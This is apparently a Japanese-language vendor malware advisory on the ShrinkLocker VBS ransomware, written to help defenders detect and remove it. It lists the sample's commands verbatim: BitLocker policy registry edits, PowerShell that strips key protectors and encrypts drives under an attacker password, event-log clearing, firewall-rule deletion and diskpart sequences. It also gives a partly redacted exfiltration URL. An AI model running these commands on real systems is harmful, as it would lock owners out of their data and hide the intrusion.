解析者: John Rainier Navato   

 別名:

Generic.VBS.ShrinkLocker.A.EABA5996 (BITDEFENDER)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    身代金要求型不正プログラム(ランサムウェア)

  • 破壊活動の有無:
    なし

  • 暗号化:
    なし

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 41,403 bytes
タイプ VBS
メモリ常駐 なし
発見日 2024年5月27日
ペイロード システム情報の収集, URLまたはIPアドレスに接続, ウインドウの表示, ファイルの暗号化, システムのレジストリの変更

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • bcdboot {Boot Drive}:\windows /s {New Drive} → reinstall the boot files on the new primary partitions
  • reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPM /t REG_DWORD /d 2 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /t REG_DWORD /d 1 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /t REG_DWORD /d 2 /f
  • reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /t REG_DWORD /d 2 /f
  • ServerManagerCmd -install BitLocker -allSubFeatures
  • powershell.exe -Command Install-WindowsFeature BitLocker -IncludeAllSubFeature -IncludeManagementTools
  • powershell.exe -Command "$protectors = (Get-BitLockerVolume -MountPoint {Target Drive}).KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint {Target Drive} -KeyProtectorId $protector.KeyProtectorId } }"
  • powershell.exe -Command $a=ConvertTo-SecureString "'{Bitlocker Paassword}'" -asplaintext -force;Enable-BitLocker {Target Drive} -s -qe -pwp -pw $a
  • powershell.exe -Command Resume-BitLocker -MountPoint {Target Drive}
  • wevtutil -cl "Windows PowerShell"
  • netsh advfirewall set allprofiles state on
  • netsh advfirewall firewall delet rule name=all
  • schtasks /Delete /TN "copy" /F
  • schtasks /Delete /TN "disk" /F

他のシステム変更

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = 1

(註:変更前の上記レジストリ値は、「1」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
scforceoption = 1

(註:変更前の上記レジストリ値は、「0」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseAdvancedStartup = 1

(註:変更前の上記レジストリ値は、「{User-defined value}」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
EnableBDEWithNoTPM = 1

(註:変更前の上記レジストリ値は、「0」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPM = 2

(註:変更前の上記レジストリ値は、「0」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMPIN = 2

(註:変更前の上記レジストリ値は、「0」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMKey = 2

(註:変更前の上記レジストリ値は、「0」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMKeyPIN = 2

(註:変更前の上記レジストリ値は、「0」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
EnableNonTPM = 1

(註:変更前の上記レジストリ値は、「0」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UsePartialEncryptionKey = 2

(註:変更前の上記レジストリ値は、「{User-defined value}」となります。)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UsePIN = 2

(註:変更前の上記レジストリ値は、「0」となります。)

情報漏えい

マルウェアは、以下の情報を収集します。

  • Hard Drive Used Space
  • Hard Drive Free Space
  • Hard Drive Label
  • Total RAM
  • Used RAM
  • Available RAM
  • Computer Name
  • Available Fixed Drives
  • Generated Bitlocker Encryption Key
  • Network Performance

情報収集

マルウェアは、HTTPポスト を介して、収集した情報を以下のURLに送信します。

  • https://{BLOCKED}ted-eating-meals-top.trycloudflare.com/updatelog

その他

マルウェアは、以下を実行します。

  • It terminates itself if the current domain is different from its target domain.
  • It terminates and deletes itself if the name of the operating system contains “xp”, “2000”, “2003”, or “vista”.
  • It issues the following commands to diskpart to do the following:
    • Shrink the size of non-boot partitions by 100 MB
      • Select Volume {Target Drive}
      • shrink desired=100
      • exit
    • Split the unallocated space into new 100 MB primary partitions. Format these partitions with the override parameter, assign a file system and a drive letter to each. Activate these partitions.
      • Select Volume {Target Drive}
      • create partition primary size=100
      • format quick recommended override
      • assign
      • active
      • exit
    • Remove the drive letter from the selected partition.
      • Select Volume {New Drive}
      • remove
      • exit
  • It starts the BitLocker Drive Encryption Service (BDESVC) if it is not running.
  • It changes the boot drive label into the attacker’s email.
  • It deletes the following files if the computer name is "MWIDC001":
    • \\{Target Domain Name}\SYSVOL\{Target Domain Name}\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
    • \\{Target Domain Name}\SYSVOL\{Target Domain Name}\scripts\Logon.vbs
    • \\{Target Domain Name}\SYSVOL\{Target Domain Name}\scripts\disk.vbs
  • It disables BitLocker's encryption key protector and deletes them. It then allows for a numerical password to be used as a protector and for encryption to be turned on.
  • It generates a random encryption key for Bitlocker using the following information as seed:
    • Pre-specified characters
    • Hard Drive Used Space
    • Hard Drive Free Space
    • Total RAM
    • Used RAM
    • Available RAM
    • Network Performance
  • It enables Bitlocker on the drives found in the affected machine using its generated encryption key.
  • It shows the following prompt when the affected machine reboots:

<補足>
インストール

マルウェアは、以下のプロセスを追加します。

  • bcdboot {起動ドライブ}:\windows /s {新しいドライブ} → 新しいプライマリパーティション上にブートファイルを再インストールする

情報漏えい

マルウェアは、以下の情報を収集します。

  • ハードドライブの使用中の容量
  • ハードドライブの空き容量
  • ハードドライブのラベル
  • RAMの総容量
  • 使用中のRAM
  • 利用可能なRAM
  • コンピュータ名
  • 利用可能な固定ドライブ
  • 生成されたBitLockerの暗号化キー
  • ネットワークのパフォーマンス

その他

マルウェアは、以下を実行します。

  • 対象とするドメインと現在のドメインが異なる場合は、自身の不正活動を終了します。
  • オペレーティングシステム(OS)の名前に「xp」、「2000」、「2003」、または「vista」が含まれている場合、不正活動を終了して自身を削除します。
  • 以下を実行するために、 コマンドラインユーティリティ「diskpart」に以下のコマンドを送信します。
    • 非ブートパーティションのサイズを100MB縮小させる
      • Select Volume {対象とするドライブ}
      • shrink desired=100
      • exit
    • 上記の未割り当て領域を新しいプライマリパーティション(100MB)内で分割する。これらのパーティションをoverrideパラメータでフォーマットし、それぞれにファイルシステムおよびドライブ文字を割り当てる。そして、これらのパーティションをアクティブ化する。
      • Select Volume {対象とするドライブ}
      • create partition primary size=100
      • format quick recommended override
      • assign
      • active
      • exit
    • 選択したパーティションからドライブ文字を削除する
      • Select Volume {新しいドライブ}
      • remove
      • exit
  • BitLocker Drive Encryption Service(BDESVC)が実行されていない場合は、開始します。
  • 起動ドライブのラベルを攻撃者の電子メールアドレスに変更します。
  • コンピュータ名が「MWIDC001」の場合、以下のファイルを削除します。
    • \\{対象とするドメイン名}\SYSVOL\{対象とするドメイン名}\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
    • \\{対象とするドメイン名}\SYSVOL\{対象とするドメイン名}\scripts\Logon.vbs
    • \\{対象とするドメイン名}\SYSVOL\{対象とするドメイン名}\scripts\disk.vbs
  • Windowsの暗号化ツール「BitLocker」の暗号化キープロテクタを無効にして削除します。その後、数字のパスワードをプロテクタとして使用し、暗号化を有効にします。
  • 以下の情報をシードとして使用して、Bitlockerの暗号化キーをランダムに生成します。
    • 事前に指定された文字
    • ハードドライブの使用中の容量
    • ハードドライブの空き容量
    • RAMの総容量
    • 使用中のRAM
    • 利用可能なRAM
    • ネットワークのパフォーマンス
  • 生成された暗号化キーを使用して、影響を受けるコンピュータ内のドライブ上でBitlockerを有効にします。
  • 影響を受けるコンピュータが再起動された場合、以下のプロンプトを表示します。

  対応方法

対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 19.458.02
初回 VSAPI パターンリリース日 2024年7月10日
VSAPI OPR パターンバージョン 19.459.00
VSAPI OPR パターンリリース日 2024年7月11日

手順 1

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

暗号化されたファイルをバックアップから復元します。

手順 3

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Ransom.VBS.SHRINKLOCKER.RG」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください